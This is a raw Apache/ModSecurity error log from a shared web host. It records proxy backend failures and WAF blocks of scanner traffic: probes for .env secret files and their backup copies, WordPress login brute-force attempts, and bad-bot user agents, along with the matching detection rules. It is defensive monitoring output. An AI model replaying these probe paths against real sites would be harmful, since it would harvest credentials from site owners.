[Tue May 26 18:45:17.842716 2026] [proxy:error] [pid 1025417:tid 1025572] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:45:17.842786 2026] [proxy_http:error] [pid 1025417:tid 1025572] [client 208.84.100.55:56024] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:45:17.842905 2026] [proxy:error] [pid 1025417:tid 1025611] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:45:17.842953 2026] [proxy_http:error] [pid 1025417:tid 1025611] [client 208.84.100.55:56052] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:45:17.843051 2026] [proxy:error] [pid 1025417:tid 1025621] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:45:17.843088 2026] [proxy_http:error] [pid 1025417:tid 1025621] [client 208.84.100.55:56130] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:45:17.843184 2026] [proxy:error] [pid 1025417:tid 1025566] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:45:17.843230 2026] [proxy_http:error] [pid 1025417:tid 1025566] [client 208.84.100.55:56212] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:45:17.843671 2026] [proxy:error] [pid 1025417:tid 1025577] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:45:17.843724 2026] [proxy_http:error] [pid 1025417:tid 1025577] [client 208.84.100.55:56196] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:45:17.843826 2026] [proxy:error] [pid 1025417:tid 1025578] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:45:17.843874 2026] [proxy_http:error] [pid 1025417:tid 1025578] [client 208.84.100.55:56098] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:45:17.844077 2026] [proxy:error] [pid 1025417:tid 1025561] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:45:17.844110 2026] [proxy_http:error] [pid 1025417:tid 1025561] [client 208.84.100.55:56020] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:45:17.844213 2026] [proxy:error] [pid 1025417:tid 1025556] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:45:17.844347 2026] [proxy_http:error] [pid 1025417:tid 1025556] [client 208.84.100.55:55962] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:45:17.844953 2026] [proxy:error] [pid 1025417:tid 1025556] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:45:17.844986 2026] [proxy_http:error] [pid 1025417:tid 1025556] [client 208.84.100.55:55962] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:45:17.845182 2026] [proxy:error] [pid 1025417:tid 1025582] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:45:17.845230 2026] [proxy_http:error] [pid 1025417:tid 1025582] [client 208.84.100.55:55980] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:45:17.845313 2026] [proxy:error] [pid 1025417:tid 1025621] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:45:17.845348 2026] [proxy_http:error] [pid 1025417:tid 1025621] [client 208.84.100.55:56130] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:45:17.845451 2026] [proxy:error] [pid 1025417:tid 1025566] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:45:17.845502 2026] [proxy_http:error] [pid 1025417:tid 1025566] [client 208.84.100.55:56212] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:45:17.845870 2026] [proxy:error] [pid 1025417:tid 1025582] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:45:17.845905 2026] [proxy_http:error] [pid 1025417:tid 1025582] [client 208.84.100.55:55980] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:45:17.846075 2026] [proxy:error] [pid 1025417:tid 1025572] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:45:17.846102 2026] [proxy_http:error] [pid 1025417:tid 1025572] [client 208.84.100.55:56024] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:45:17.846177 2026] [proxy:error] [pid 1025417:tid 1025588] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:45:17.846226 2026] [proxy_http:error] [pid 1025417:tid 1025588] [client 208.84.100.55:56114] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:45:17.846962 2026] [proxy:error] [pid 1025417:tid 1025588] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:45:17.846997 2026] [proxy_http:error] [pid 1025417:tid 1025588] [client 208.84.100.55:56114] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:45:17.847162 2026] [proxy:error] [pid 1025417:tid 1025586] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:45:17.847198 2026] [proxy_http:error] [pid 1025417:tid 1025586] [client 208.84.100.55:56112] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:45:17.849187 2026] [proxy:error] [pid 1025417:tid 1025586] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:45:17.849226 2026] [proxy_http:error] [pid 1025417:tid 1025586] [client 208.84.100.55:56112] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:45:17.887913 2026] [security2:error] [pid 1025417:tid 1025482] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/store/.env"] [unique_id "ahWc5VHbArxonFeMXvQU9QAAaEA"]
[Tue May 26 18:45:18.204210 2026] [security2:error] [pid 1025417:tid 1025591] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWc5VHbArxonFeMXvQU1wAAACw"]
[Tue May 26 18:45:19.800516 2026] [security2:error] [pid 1025417:tid 1025499] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/blog/.env"] [unique_id "ahWc51HbArxonFeMXvQVKAAAN1E"]
[Tue May 26 18:45:19.963251 2026] [security2:error] [pid 1025417:tid 1025493] [remote 94.76.235.103:48992] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.235.76.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWc51HbArxonFeMXvQVJAAASks"]
[Tue May 26 18:45:20.268602 2026] [security2:error] [pid 1025417:tid 1025575] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWc51HbArxonFeMXvQVKwAAABw"]
[Tue May 26 18:45:20.537658 2026] [proxy:error] [pid 1025417:tid 1025588] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:45:20.537720 2026] [proxy_http:error] [pid 1025417:tid 1025588] [client 208.84.100.55:56014] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:45:20.538279 2026] [proxy:error] [pid 1025417:tid 1025588] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:45:20.538307 2026] [proxy_http:error] [pid 1025417:tid 1025588] [client 208.84.100.55:56014] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:45:20.990484 2026] [security2:error] [pid 1025417:tid 1025607] [client 107.170.66.128:49190] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "consola.jhonweb.com"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahWc6FHbArxonFeMXvQVWQAAADw"]
[Tue May 26 18:45:21.014463 2026] [security2:error] [pid 1025417:tid 1025505] [remote 222.165.190.235:49680] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.190.165.222.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWc6FHbArxonFeMXvQVUQAAW1c"]
[Tue May 26 18:45:21.190979 2026] [security2:error] [pid 1025417:tid 1025596] [client 107.170.66.128:49327] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "consola.jhonweb.com"] [uri "/news/wp-includes/wlwmanifest.xml"] [unique_id "ahWc6VHbArxonFeMXvQVXQAAADE"]
[Tue May 26 18:45:21.463786 2026] [security2:error] [pid 1025417:tid 1025507] [remote 222.165.190.235:49680] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.190.165.222.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWc6VHbArxonFeMXvQVYwAAY1k"], referer: https://yourstorybag.com/wp-login.php
[Tue May 26 18:45:21.687440 2026] [security2:error] [pid 1025417:tid 1025513] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/new/.env"] [unique_id "ahWc6VHbArxonFeMXvQVdAAAdV8"]
[Tue May 26 18:45:22.541699 2026] [security2:error] [pid 1025417:tid 1025562] [client 208.84.100.55:56010] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "cpcontacts.veganfoodindia.com"] [uri "/___proxy_subdomain_cpcontacts/.env.production.copy"] [unique_id "ahWc6lHbArxonFeMXvQVhAAAAA8"]
[Tue May 26 18:45:22.542686 2026] [proxy:error] [pid 1025417:tid 1025558] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:45:22.542741 2026] [proxy_http:error] [pid 1025417:tid 1025558] [client 208.84.100.55:56002] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:45:22.542870 2026] [proxy:error] [pid 1025417:tid 1025589] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:45:22.542932 2026] [proxy_http:error] [pid 1025417:tid 1025589] [client 208.84.100.55:55964] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:45:22.543345 2026] [proxy:error] [pid 1025417:tid 1025558] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:45:22.543380 2026] [proxy_http:error] [pid 1025417:tid 1025558] [client 208.84.100.55:56002] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:45:22.543512 2026] [proxy:error] [pid 1025417:tid 1025589] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:45:22.543557 2026] [proxy_http:error] [pid 1025417:tid 1025589] [client 208.84.100.55:55964] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:45:23.417642 2026] [security2:error] [pid 1025417:tid 1025608] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWc6lHbArxonFeMXvQVlQAAAD0"]
[Tue May 26 18:45:23.514561 2026] [security2:error] [pid 1025417:tid 1025517] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/old/.env"] [unique_id "ahWc61HbArxonFeMXvQVnwAANWM"]
[Tue May 26 18:45:24.010460 2026] [security2:error] [pid 1025417:tid 1025520] [remote 185.190.18.72:48374] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 72.18.190.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWc61HbArxonFeMXvQVrAAAYmY"]
[Tue May 26 18:45:24.870527 2026] [proxy:error] [pid 1025417:tid 1025652] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:45:24.870590 2026] [proxy_http:error] [pid 1025417:tid 1025652] [client 208.84.100.55:45974] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:45:24.870845 2026] [security2:error] [pid 1025417:tid 1025607] [client 208.84.100.55:46014] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "cpcontacts.veganfoodindia.com"] [uri "/___proxy_subdomain_cpcontacts/.env.production.old"] [unique_id "ahWc7FHbArxonFeMXvQVyAAAADw"]
[Tue May 26 18:45:24.871169 2026] [proxy:error] [pid 1025417:tid 1025652] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:45:24.871206 2026] [proxy_http:error] [pid 1025417:tid 1025652] [client 208.84.100.55:45974] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:45:24.928244 2026] [security2:error] [pid 1025417:tid 1025656] [client 208.84.100.55:45924] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "cpcontacts.veganfoodindia.com"] [uri "/___proxy_subdomain_cpcontacts/.env.local.swp"] [unique_id "ahWc7FHbArxonFeMXvQVygAAAG0"]
[Tue May 26 18:45:24.928367 2026] [security2:error] [pid 1025417:tid 1025638] [client 208.84.100.55:45922] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "cpcontacts.veganfoodindia.com"] [uri "/___proxy_subdomain_cpcontacts/.env.local~"] [unique_id "ahWc7FHbArxonFeMXvQVzAAAAFs"]
[Tue May 26 18:45:24.928525 2026] [security2:error] [pid 1025417:tid 1025556] [client 208.84.100.55:45950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "cpcontacts.veganfoodindia.com"] [uri "/___proxy_subdomain_cpcontacts/.env.local.copy"] [unique_id "ahWc7FHbArxonFeMXvQVywAAAAk"]
[Tue May 26 18:45:24.931570 2026] [security2:error] [pid 1025417:tid 1025570] [client 208.84.100.55:45838] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "cpcontacts.veganfoodindia.com"] [uri "/___proxy_subdomain_cpcontacts/.env~"] [unique_id "ahWc7FHbArxonFeMXvQVzgAAABc"]
[Tue May 26 18:45:24.931578 2026] [security2:error] [pid 1025417:tid 1025620] [client 208.84.100.55:45868] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "cpcontacts.veganfoodindia.com"] [uri "/___proxy_subdomain_cpcontacts/.env.copy"] [unique_id "ahWc7FHbArxonFeMXvQVzQAAAEk"]
[Tue May 26 18:45:24.933511 2026] [security2:error] [pid 1025417:tid 1025661] [client 208.84.100.55:45862] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "cpcontacts.veganfoodindia.com"] [uri "/___proxy_subdomain_cpcontacts/.env.orig"] [unique_id "ahWc7FHbArxonFeMXvQVzwAAAHI"]
[Tue May 26 18:45:24.934930 2026] [proxy:error] [pid 1025417:tid 1025622] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:45:24.935024 2026] [proxy_http:error] [pid 1025417:tid 1025622] [client 208.84.100.55:45836] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:45:24.935652 2026] [proxy:error] [pid 1025417:tid 1025622] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:45:24.935700 2026] [proxy_http:error] [pid 1025417:tid 1025622] [client 208.84.100.55:45836] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:45:24.936020 2026] [proxy:error] [pid 1025417:tid 1025642] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:45:24.936082 2026] [proxy_http:error] [pid 1025417:tid 1025642] [client 208.84.100.55:45788] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:45:24.936670 2026] [proxy:error] [pid 1025417:tid 1025642] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:45:24.936706 2026] [proxy_http:error] [pid 1025417:tid 1025642] [client 208.84.100.55:45788] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:45:25.233118 2026] [security2:error] [pid 1025417:tid 1025596] [client 208.84.100.55:45854] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "cpcontacts.veganfoodindia.com"] [uri "/___proxy_subdomain_cpcontacts/.env.swp"] [unique_id "ahWc7VHbArxonFeMXvQV2QAAADE"]
[Tue May 26 18:45:25.233523 2026] [security2:error] [pid 1025417:tid 1025633] [client 208.84.100.55:45986] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "cpcontacts.veganfoodindia.com"] [uri "/___proxy_subdomain_cpcontacts/.env.production~"] [unique_id "ahWc7VHbArxonFeMXvQV2AAAAFY"]
[Tue May 26 18:45:25.489383 2026] [security2:error] [pid 1025417:tid 1025602] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWc7VHbArxonFeMXvQV1wAAADc"]
[Tue May 26 18:45:25.587522 2026] [security2:error] [pid 1025417:tid 1025418] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/app/.env"] [unique_id "ahWc7VHbArxonFeMXvQV6gAAfQA"]
[Tue May 26 18:45:25.729219 2026] [security2:error] [pid 1025417:tid 1025579] [client 185.191.171.5:13192] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.anujtradingco.com"] [uri "/top-deejay-headphones/"] [unique_id "ahWc7VHbArxonFeMXvQV7gAAACA"]
[Tue May 26 18:45:25.729344 2026] [security2:error] [pid 1025417:tid 1025579] [client 185.191.171.5:13192] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.anujtradingco.com"] [uri "/top-deejay-headphones/"] [unique_id "ahWc7VHbArxonFeMXvQV7gAAACA"]
[Tue May 26 18:45:25.938212 2026] [security2:error] [pid 1025417:tid 1025431] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWc7VHbArxonFeMXvQV8wAAXg0"]
[Tue May 26 18:45:25.938374 2026] [security2:error] [pid 1025417:tid 1025641] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWc7VHbArxonFeMXvQV8wAAXg0"]
[Tue May 26 18:45:25.940197 2026] [security2:error] [pid 1025417:tid 1025586] [client 185.242.3.182:52366] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "rathnaa.co.in"] [uri "/index.htm"] [unique_id "ahWc7VHbArxonFeMXvQV8gAAACc"]
[Tue May 26 18:45:26.098863 2026] [security2:error] [pid 1025417:tid 1025525] [remote 185.190.18.72:48374] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 72.18.190.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWc7lHbArxonFeMXvQV9AAAI2s"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:45:26.342238 2026] [security2:error] [pid 1025417:tid 1025553] [client 208.84.100.55:45994] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "cpcontacts.veganfoodindia.com"] [uri "/___proxy_subdomain_cpcontacts/.env.production.swp"] [unique_id "ahWc7lHbArxonFeMXvQV-wAAAAY"]
[Tue May 26 18:45:26.344516 2026] [security2:error] [pid 1025417:tid 1025581] [client 208.84.100.55:46006] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "cpcontacts.veganfoodindia.com"] [uri "/___proxy_subdomain_cpcontacts/.env.production.orig"] [unique_id "ahWc7lHbArxonFeMXvQV_AAAACI"]
[Tue May 26 18:45:26.344565 2026] [security2:error] [pid 1025417:tid 1025607] [client 208.84.100.55:45968] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "cpcontacts.veganfoodindia.com"] [uri "/___proxy_subdomain_cpcontacts/.env.production.backup"] [unique_id "ahWc7lHbArxonFeMXvQV_QAAADw"]
[Tue May 26 18:45:26.349554 2026] [security2:error] [pid 1025417:tid 1025656] [client 208.84.100.55:45940] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "cpcontacts.veganfoodindia.com"] [uri "/___proxy_subdomain_cpcontacts/.env.local.orig"] [unique_id "ahWc7lHbArxonFeMXvQV_gAAAG0"]
